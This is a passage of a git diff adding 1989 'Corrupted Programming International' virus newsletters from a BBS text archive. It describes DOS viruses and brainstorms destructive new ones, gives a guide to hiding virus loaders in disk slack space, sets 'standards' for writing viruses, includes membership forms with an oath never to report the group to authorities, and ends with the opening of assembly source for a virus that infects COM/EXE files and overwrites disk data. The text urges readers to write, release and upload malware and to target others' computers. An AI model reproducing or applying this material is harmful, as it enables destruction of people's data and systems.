in the + system's memory and upon each execution of a COM or EXE file, copies + itself onto the host phile. This one is very clever, before infecting + the file, it preserves the attributes and date/time stamp on the + file, modifies the files attributes (removes READ only status so it + can write on it), and then restores all previous values to the file. + This virus takes very little space, and increases the host file size + by approximately 1800 bytes. The trigger of this virus is the date + Friday the 13th. This trigger will cause the virus to either trash + the disk/s or delete the files as you execute them, depending on the + version. Whoever wrote this sure did a nice job.... + + Lehigh - This one infects the COMMAND.COM file, which is always + run before bootup, so the system is ready for attack at EVERY bootup. + It hides itself via TSR type and when any disk access is made, the + TSR checks the COMMAND.COM to see if it is infected. Then if it + isn't, it infects it, and adds a point to its counter. When the + counter reaches 4, the virus causes the disk to crash. This one, + however, can be stopped by making your COMMAND.COM Read-Only, and the + date/time stamp is not preserved, so if the date/time stamp is + recent, one could be infected with this virus. This virus is + transferred via infected floppy disks as well as a clean disk in an + infected system. It can not infect other hosts via modem, unless the + COMMAND.COM is the file being transferred. + + Pakistani Brain - This one infects the boot sector of a floppy + disk. When booting off of the disk, the virus becomes a TSR program, + and then marks an unused portion of the disk as "bad sectors." The + bad sectors, cannot be accessed by DOS. However, a disk directory of + an infected disk will show the volume label to be @ BRAIN. A CHKDSK + will find a few bad sectors. When you do a directory of a clean disk + on an infected system, the disk will become infected. The virus has + no trigger and immediately begins to mark sectors bad even though + they are good. Eventually, you will have nothing left except a bunch + of bad sectors and no disk space. The virus itself has the ASCII + written into it with the words "Welcome the the Dungeon" as well the + names of the supposed authors of the virus, and address, telephone + number, and a few other lame messages. To inoculate your system + against this virus, just type 1234 at byte offset location 4 on the + boot track (floppy disks). + + Alameda - This virus also infects the boot sector of the host + system. It is very small and inhabits ONE sector. This one only + damages floppy disks. If you boot from a diseased disk, the virus + loads itself into HIGH memory and during a warm boot, it remains in + memory and infects any other clean disks being booted from on the + infected system. It then replaces the boot track with the virus track + and replaces the boot track on the last track of the disk, so any + data located on the last track is corrupted. All floppy disks + inserted during reboot can catch this virus. This virus only infects + IBM PC's and XT's, however, it does not infect 286's or 386's. + + dBase - This one is a TSR virus that works in a manner similar + to the Israeli virus. It looks for files with a DBF extension, then + it replicates itself in all DBF files, preserving file size, and all + attributes. After the first 90 days, the virus destroys your file + allocation table and corrupts all data in the DBF files. This virus + creates a hidden file, BUG.DAT that indicates the bytes transposed + (in order to preserve file specifications). Run a CHKDSK to make sure + you don't have any extra hidden files or a BUG.DAT in your dBase + directory. If you create a BUG.DAT file manually in your directory, + making it read-only, you will be safe from this virus. + + Screen - This one is another TSR virus that comes on and off + periodically. When it is on, it examines the screen memory and looks + for any 4 digits starting at a random place on the screen. Then it + transposes two of them, this is not a good thing. It infects every + COM file in your directory, HARD and FLOPPY disks can be infected. + You can use a ASCII searcher to check if you are infected by + searching for "InFeCt" in your COM files. If you have this written, + read the 4 bytes immediately preceding it and overwrite the first 4 + bytes of the program with their value. Then, truncate the program at + their stored address. You will rid yourself of this virus. Make sure + you use a clean copy of you editor for this. + + Other viruses include MAC, AMIGA, and many other environments. + By the way, other computer systems other than IBM/DOS may become part + of CPI if you qualify. + + Anyway, these are a few viruses I have read on and thus passed + the information to you, I hope you can learn from them and get some + ideas for some. + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.4] Ideas For Future Viruses + + + Since I have covered viruses already in existence, lets talk + about viruses that can or may exist in the near future. These are not + even close to half the ideas possible for destruction with + trojans/viruses available, but will pose as a challenge to you who + are short of ideas. + + CSR Virus - A CMOS Stay Resident VIRUS that will implant itself + in the CMOS memory of the AT (286/386/486?) which will execute upon + every bootup. This one would be VERY nice. + + Failsafe Virus - Preserves ALL attributes, Preserves file size, + remains TSR but hidden to TSR location programs, Modifies attributes + to get around Read-Only files, Infects ALL files (Not only COM and + EXE), encrypts all data on trigger (irreversible) but preserves + original file size/attributes. + + Format Virus - A virus which is TSR and when a DOS format or any + other FORMAT type of call is called, will FORMAT every other track, + but will not allow DOS to notice. + + Write Virus - A virus that intercepts write to disk, which + deletes the disk write, and marks sector as bad at write point. + + ASCII Virus - Virus that would scramble ASCII text in any file + at trigger. + + Low Level Format Virus - Virus that low level formats (BAD + format) HD in background with data still intact. I have seen regular + background LLF programs, and it keeps data in place, but it does it + correctly... hmmm...? + + Hide Virus - A Virus that hides files slowly. + + Crash Virus - Virus that emulates typical system crashes/freezes + occasionally. Causes BIOS to freeze and write BIOS ERROR messages on + screen. + + Modem Virus - One that remains in boot sector and TSR and + monitors data from serial ports, puts in "artificial" line-noise. + NICE! + + These are just a few I thought up... these could be really + good... Think of some more and call CPI HQ TODAY! + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.5] Suggested Reading + + + The following list is a compiled listing of some material I have + read as well as other sources you MIGHT find information on + concerning viruses and trojan horses. Happy trashing.... + + + "Know Thy Viral Enemy" by Ross M. Greenberg + BYTE Magazine + June 1989, pg 275-280 + + "Viruses: Assembly, Pascal, BASIC & Batch" by Tesla Coil ][ + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #3, Volume 2, Phile #2 + + "Computer Viruses: A High Tech Disease" by Abacus + 2600 Magazine + Volume 5, Number 2 + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.6] Conclusion + + + Thus ends the first issue of CPI's "Computer Viruses: A + Protagonist's Point Of View." We hope you enjoyed it and we hope it + was informative and complete (at least about the specific issues). + + We, VRI, hope that you will share your information and comments + with us at VRI Headquarters, as this newsletter will require both + information and an expansion of our current member base. If you feel + you have what it takes to gather, read, or program for VRI, send us + an application today. + + Oh yeah, if this happens to be the only issue of VRICV, oh well, + and many thanx to those who read it at least once, and enjoyed it (or + laughed at it). Until our (my?) next issue, have phun and don't get + toooo wild...... + + + + + =====[ CPI Headquarters * 619-566-7093 * 1200/2400bps * 24Hrs ]===== + +Downloaded From P-80 International Information Systems 304-744-2253 + [1.7] CPI Application + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNANATIONAL<< + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionairre. Please answer the following completely + and to the best of your ability. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your REAL FULL NAME : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your City & State : + Your Age : + Occupation/Grade : + Place Of Employment : + Work Phone Number : + Your Interests And Hobbies : + +Is Your Job IN ANY WAY Related To ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI, Sheriff, Police) +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Elite References : + Computers You Have Used : + Computer You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Alot : + Have You Ever Hacked : + Do You Hack Alot : + Have You Ever Cracked : + Do You Crack Alot : + Ever Made A Virus/Trojan : + Major Accomplishments : + + +MISC INFORMATION +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name a few? +: +: +: +: + +Have you considered the distribuition of viruses/trojans as a "crime"? Why +or why not? (Morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject?) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +Can you contribute to CPI? How? +:(Do you have access to info concerning virus/trojans) +:(Exceptional programmer?) +:(Got connections?) +:(Anything extraordinary?) + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The CPI Headquarters BBS + *(619) 566-7093 * 1200/2400 * 24 Hrs* + + Future CPI Support BBS's Will Be Active - Applications May Be Turned In Then + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/cpi2.vir b/textfiles.com/virus/cpi2.vir new file mode 100644 index 00000000..3bac7a1a --- /dev/null +++ b/textfiles.com/virus/cpi2.vir @@ -0,0 +1,2124 @@ +[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * * + * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@ @@@@ @@@@ @@@@ @@@ * + * @@@ @@@ @@@@ @@@ * + * @@@ @@@@@@@@@@@@@@@ @@@ * + * @@@ @@@@@@@@@@@@@@ @@@ * + * @@@ @@@ @@@ * + * @@@@ @@@@ @@@ @@@ * + * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + + C O R R U P T E D + + P R O G R A M M I N G + + I N T E R N A T I O N A L + + + + presents: + + + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + @ @ + @ Virili And Trojan Horses @ + @ @ + @ A Protagonist's Point Of View @ + @ @ + @ Issue #2 @ + @ @ + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + + + DISCLAIMER::All of the information contained in this newsletter reflects the + thoughts and ideas of the authors, not their actions. The sole + purpose of this document is to educate and spread information. + Any illegal or illicit action is not endorsed by the authors or + CPI. The authors and CPI are not responsible for any information + which may present itself as old or mis-interpreted, and actions + by the reader. Remember, 'Just Say No!' + + + + + + + + + + + + +CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + Introduction To CPI#2 + --------------------- + Well, here is the "long awaited" second issue of CPI, A Protagonist's Point +of view. This issue should prove a bit interesting, I dunno, but at least +entertaining for the time it takes to read. Enjoy the information and don't +forget the disclaimer. + Oh yes, if you have some interesting articles or an application to send +us, just see the BBS list at the end of this document. Thanx. All applications +and information will be voted on through the CPI Inner Circle. Hope you enjoy +this issue as much as we enjoyed typing it... hehe... + Until our next issue, (which may be whenever), good-bye. + + Doctor Dissector + + + Table of Contents + ----------------- + Part Title Author + ----------------------------------------------------------------------------- + 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector + 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak + 2.3 V-IDEA-1.............................................. Ashton Darkside + 2.4 V-IDEA-2.............................................. Ashton Darkside + 2.5 The Generic Virus..................................... Doctor Dissector + 2.6 Aids.................................................. Doctor Dissector + 2.7 Batch File Virus...................................... PHUN 3.2 + 2.8 Basic Virus........................................... PHUN 3.2 + 2.9 The Alemeda Virus..................................... PHUN 4.3 + 2.10 Virili In The News.................................... Various Sources + 2.11 Application For CPI................................... CPI Inner Circle + (CPI Node Phone #'s Are In 2.11) + +Downloaded From P-80 International Information Systems 304-744-2253 + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a "crime"? Why +or why not? Have you ever considered the consequences that could result +from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) + + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPI's activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPI's activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + * 619-566-7093 * 1200/2400 * 24 HRS * + + + _______________________<==| CURRENT WCCA NODES |==>_________________________ + /--------------+------------------------------------+-----------------+------\ + | Phone Number | Node Name | Sysop | Baud | + +--------------+------------------------------------+-----------------+------+ + | 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 | + \--------------+------------------------------------+-----------------+------/ + + Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.2] + Explanation of Viruses and Trojans Horses + ----------------------------------------- + Written by Acid Phreak + + Like it's biological counterpart, a computer virus is an agent of +infection, insinuating itself into a program or disk and forcing its host +to replicate the virus code. Hackers fascinated by the concept of "living" +code wrote the first viruses as projects or as pranks. In the past few +years, however, a different kind of virus has become common, one that lives +up to an earlier meaning of the word: in Latin, virus means poison. + These new viruses incorporate features of another type of insidious +program called a Trojan horse. Such a program masquerades as a useful +utility or product but wreaks havoc on your system when you run it. It may +erase a few files, format your disk, steal secrets--anything software can +do, a Trojan horse can do. A malicious virus can do all this then attempt +to replicate itself and infect other systems. + The growing media coverage of the virus conceptand of specific viruse +has promoted the development of a new type of software. Antivirus programs, +vaccines--they go by many names, but their purpose is to protect from virus +attack. At present there are more antivirus programs than known viruses +(not for long). + Some experts quibble about exactly what a virus is. The most widely +known viruses, the IBM Xmas virus and the recent Internet virus, are not +viruses according to some experts because they do not infect other programs. +Others argue that every Trojan horse is a virus--one that depends completely +on people to spread it. + +How They Reproduce: +------------------- + Viruses can't travel without people. Your PC will not become infected +unless someone runs an infected program on it, whether accidentally or on +purpose. PC's are different from mainframe networks in this way--the +mainframe Internet virus spread by transmitting itself to other systems and +ordering them to execute it as a program. That kind of active transmission +is not possible on a PC. + Virus code reproduces by changing something in your system. Some viruses +strike COMMAND.COM or the hidden system files. Others, like the notorious +Pakistani-Brain virus, modify the boot sector of floppy disks. Still others +attach themselves to any .COM or .EXE file. In truth, any file on your +system that can be executed--whether it's a program, a device driver, an +overlay, or even a batch file--could be the target of a virus. + When an infected program runs, the virus code usually executes first and +then transfers control to the original program. The virus may immediately +infect other programs, or it may load itself into RAM and continue spreading. +If the virus can infect a file that will be used on another system, it has +succeeded. + +What They Can Do: +----------------- + Viruses go through two phases: a replication phase and an action phase. +The action doesn't happen until a certain even occurs--perhaps reaching a +special date or running the virus a certain number of times. It wouldn't +make sense for a virus to damage your system the first time it ran; it needs +some time to grow and spread first. + The most vulnerable spot for a virus attack is your hard disk's file +allocation table (FAT). This table tells DOS where every file's data resides +on the disk. Without the FAT, the data's still there but DOS can't find it. +A virus could also preform a low-level format on some or all the tracks of +your hard disk, erase all files, or change the CMOS memory on AT-class +computers so that they don't recognize the hard disk. + Most of the dangers involve data only, but it's even possible to burn +out a monochrome monitor with the right code. + Some virus assaults are quite subtl. One known virus finds four +consecutive digits on the screen and switches two. Let's hope you're not +balancing the company's books when this one hits. Others slow down system +operations or introduce serious errors. + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.3] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + "Ok, I've written the virus, now where the hell do I put it?" + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + Ok, wow! You've just invented the most incredibly nifty virus. It +slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! +But the only problem is, if you go around infecting every damn file, some cute +software company is going to start putting in procedures that checksum their +warez each time they run, which will make life for your infecting virus a total +bitch. Or somebody's going to come up with an incredibly nifty vaccination util +that will wipe it out. Because, i mean, hey, when disk space starts vanishing +suddenly in 500K chunks people tend to notice. Especially people like me that +rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying +"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need +to go around wasting your precious time when the answer is right there in front +of you! Think about it, you could be putting that time into writing better and +more inovative viruses, or you could be worring about keeping the file size, +the date & time, and the attributes the same. With this system, you only need +to infect one file, preferably one that's NOT a system file, but something that +will get run alot, and will be able to load your nifty virus on a daily basis. +This system also doesn't take up any disk space, other than the loader. And the +loader could conceivably be under 16 bytes (damn near undetectable). First of +all, you need to know what programs to infect. Now, everybody knows about using +COMMAND.COM and that's unoriginal anyway, when there are other programs people +run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or +WordPerfect; you get the idea. Better still are dos commands like Format, Link +or even compression utilities. But you get the point. Besides, who's going to +miss 16 bytes, right? Now, the good part: where to put the damn thing. One note +to the programmer: This could get tricky if your virus is over 2k or isn't +written in Assembly, but the size problem is easy enough, it would be a simple +thing to break your virus into parts and have the parts load each other into +the system so that you do eventually get the whole thing. The only problem with +using languages besides assembly is that it's hard to break them up into 2k +segments. If you want to infect floppys, or smaller disks, you'd be best off to +break your file into 512 byte segments, since they're easier to hide. But, hey, +in assembly, you can generate pretty small programs that do alot, tho. Ok, by +now you've probably figured out that we're talking about the part of the disk +called 'the slack'. Every disk that your computer uses is divided up into parts +called sectors, which are (in almost all cases) 512 bytes. But in larger disks, +and even in floppies, keeping track of every single sector would be a complete +bitch. So the sectors are bunched together into groups called 'clusters'. On +floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard +disks, they're typically 4096 bytes, or eight sectors. Now think about it, you +have programs on your hard disk, and what are the odds that they will have +sizes that always end up in increments of 4096? If I've lost you, think of it +this way: the file takes up a bunch of clusters, but in the last cluster it +uses, there is usually some 'slack', or space that isn't used by the file. This +space is between where the actual file ends and where the actual cluster ends. +So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard +disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton +program 'FS /S /T' command from your root directory, and subtract the total +size of the files from the total disk space used. That's how much 'slack' space +is on your disk (a hell of alot, even on a floppy). To use the slack, all you +need to do is to find a chunk of slack big enough to fit your virus (or a +segment of your virus) and use direct disk access (INT 13) to put your virus +there. There is one minor problem with this. Any disk write to that cluster +will overwrite the slack with 'garbage' from memory. This is because of the way +DOS manages it's disk I/O and it can't be fixed without alot of hassles. But, +there is a way around even this. And it involves a popular (abeit outdated and +usually ineffectual) form of virus protection called the READ-ONLY flag. This +flag is the greatest friend of this type of virus. Because if the file is not +written to, the last cluster is not written to, and voila! Your virus is safe +from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk +I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set + +because that has the same Read-only effect (even tho I haven't seen it written, +it's true that if the file is designated system, DOS treats it as read-only, +whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM +in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too +lazy to find out myself) or a protected (!) COMMAND.COM file in either type of +DOS would be ideal for this. All you have to do is then insert your loader into +some innocent-looking file, and you are in business. All your loader has to do +is read the sector into the highest part of memory, and do a far call to it. +Your virus cann then go about waiting for floppy disks to infect, and place +loaders on any available executable file on the disk. Sound pretty neet? It is! +Anyway, have fun, and be sure to upload your virus, along with a README file on +how it works to CPI Headquarters so we can check it out! And remember: don't +target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if +the Sysop is a leech and you want to shove his balls down his throat. Because +if all the PHP boards go down (especially members of CPI), who the hell can you +go to for all these nifty virus ideas? And besides, it's betraying your own +people, which is uncool even if you are an anarchist. So, target uncool PD +boards, or your boss's computer or whatever, but don't attack your friends. +Other than that, have phun, and phuck it up! + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applicaitons Network (SATAN) + Corrupted Programmers International (CPI) + + +PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). + +Call these boards because the sysops are cool: +Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) +System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader) +The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) +D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) +The Jolly Bardsmen's Pub & Tavern +The Sierra Crib +The Phrozen Phorest +Knight Shadow's Grotto + +And if I forgot your board, sorry, but don't send me E-mail bitching about it! + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.4] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + CPI Virus Standards - Protect yourself and your friends + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + One of the main problems with viruses is that once you set one loose, +it is no longer under your control. I propose to stop this by introducing some +standards of virus writing that will enable them to be deactivated whenever +they enter a 'friendly' (CPI) system. In the long run, even the author of the +virus is not immune to being attacked. The following are what I have termed the +CPI standards for writing viruses. They will allow a virus to easily check any +system they are being run on for a type of 'identity badge'. If it is found, +the virus will not infect the system it is being run on. The other standards +are mostly written around this. + +CPI Standards for writing viruses - + + 1 - The virus will have an 'active period' and an 'inactive period'. + The active periods will be no more than one year in length (to make + it more difficult to discover the virus). You may release different + versions of your virus with different 'active periods'. It is not + recommended that your virus deactivate itself after the set active + period, as this would enable people to deactivate viruses by using + their computer with the date set to 2069 or something. It is also + required that activation periods begin on January 1 and end on + December 31. This will coincide with the changing identity codes. + + 2 - The virus will check for an identity code by executing Interrrupt + 12h with the following register settings: AX - 4350, BX - 4920, + CX - AB46, DX - 554E. If the system is friendly, then a pointer + will be returned in CX:DX to an ASCIIZ (0-terminated) string which + will have different contents in different years. The codes are not + to be included in any text file, and should only be given through + E-mail on CPI affiliated systems. You can always ask me by sending + me mail at The Andromeda Strain BBS. If a system is detected as + friendly, the virus will not attempt to infect or damage it, but it + is ok to display a little greeting message about how lucky the + user was. + + 3 - We very much encourage you to upload your virus, along with a breif + description on the workings into the CPI section at The Andromeda + Strain BBS. Only CPI members will know about your virus. This is + so that CPI members can share techniques and it also allows us to + verify that the identity check works. If we see any improvements + that could be made, such as ways to streamline code, better ways of + spreading, etc. we will inform you so that you can make the changes + if you wish. + + 4 - It is also suggested that you use ADS standard for virus storage on + infected disks. This meathod uses disk slack space for storage and + is more thoroughly described in a previous text file by me. I think + that this is the most effective and invisible way to store viruli. + + 5 - A list of CPI-Standard viruli will be avaliable at all times from + The Andromeda Strain BBS, to CPI users. Identity strings will also + be available to anyone in CPI, or anyone who uploads source code to + a virus which is 100% complete except for the Identity string (it + must be written to CPI-Standards). Non-CPI members who do this will + be more seriously considered for membership in CPI. + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applications Network (SATAN) + Corrupted Programmers International (CPI) + +PS: This file (by itself) has approx 2.5k of slack. + +Downloaded From P-80 International Information Systems 304-744-2253 +;[2.5] +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO +; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. +; +; DOCTOR DISSECTOR +; CPI INNER CIRCLE +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV 